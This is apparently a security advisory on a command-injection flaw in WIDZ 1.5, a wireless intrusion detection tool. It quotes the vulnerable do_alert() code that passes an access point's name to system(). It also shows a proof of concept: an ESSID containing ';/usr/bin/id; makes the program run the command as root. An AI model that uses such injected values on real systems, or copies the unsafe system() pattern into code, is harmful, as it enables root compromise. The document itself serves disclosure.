|
Brought to you by:
Suppliers of:
|
|
|
| |
| WIDZ "the first Open Source wireless IDS that has the ability to detects rogue Access Points, Monkey-jacks, NULL probes, Floods, MAC Backlist nodes, and ESSID blacklisted nodes, allowing you to catch bad guys in action". Due to inappropriate filtering of code, it is possible to cause the program to execute arbitrary commands. |
| |
Credit:
The information has been provided by KF.
|
| |
Vulnerable systems:
* WIDZ version 1.5 and prior
Vulnerable code:
do_alert(char *target)
{
char mess[100];
if ( DEBUG )
printf("Alert unknown AP %s\n", target);
sprintf(mess,"Alert 'unknown AP %s\n'", target);
system(mess);
// Should do a check to see if we've alerted already but !!!
}
As you can see the function system(mess) is executed without proper filtering, therefore it is possible to cause it to execute arbitrary code.
Go to apple airport and set network name to ';/usr/bin/id; (Use HostAP instead)
snifz0r widz # ./widz_apmon 1 eth1 monitor
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file
At this point, the attacker can pretty much do what they wish. As a side note this is not the only WIDZ program to make use of system() in this manor.
|
|
|
|
|
